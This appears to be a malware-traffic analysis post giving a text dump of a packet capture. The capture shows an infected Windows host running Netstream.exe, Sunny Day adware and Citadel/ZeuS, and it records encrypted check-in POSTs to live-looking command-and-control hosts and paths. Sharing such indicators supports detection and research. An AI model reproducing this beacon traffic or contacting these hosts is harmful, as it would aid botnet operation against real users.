Netstream.exe Loads Sunny Day and Citadel/ZeuS Malware PCAP file download

Netstream.exe Loads Sunny Day and Citadel/ZeuS Malware PCAP file download
2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1
E…?…..|….f%….F.P…?~…P…….POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 564053523
x-spidermessenger-length: 280
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 386
Cache-Control: no-cache

ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D

2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
E..a@……….f.P…G.P….I.a.P…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, length 235
E…S…..j….f%..v.E……..9.P………………W…,…|_M.]]………..>..J…..\…
.9.8………5……………
… .3.2…..E.D…../…A………………. ……………]………upd.adskyforever.com………
.4.2…………….. .
2016-08-25 20:40:58.906135 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [P.], seq 0:341, ack 1, win 64240, length 341: HTTP: POST /file.php HTTP/1.1
E..}x6………fW..:.K.P…..@.6P….{..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

Xi%.i….<_gDUB4…..E..I……D.&…X…….g]….2.}dz4.w.J.|5..<..ZqD.)o…..P,..o….|..b;..”f…P-..@…..2.X5.m…….-.”q..
2016-08-25 20:40:58.920785 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [.], ack 1603268971, win 64240, length 0
E..(x7…..d…fW..:.L.Pr…_..kP…h………
2016-08-25 20:40:58.921202 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [P.], seq 0:353, ack 1, win 64240, length 353: HTTP: POST /file.php HTTP/1.1
E…x8………fW..:.L.Pr…_..kP….$..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

Leave a Reply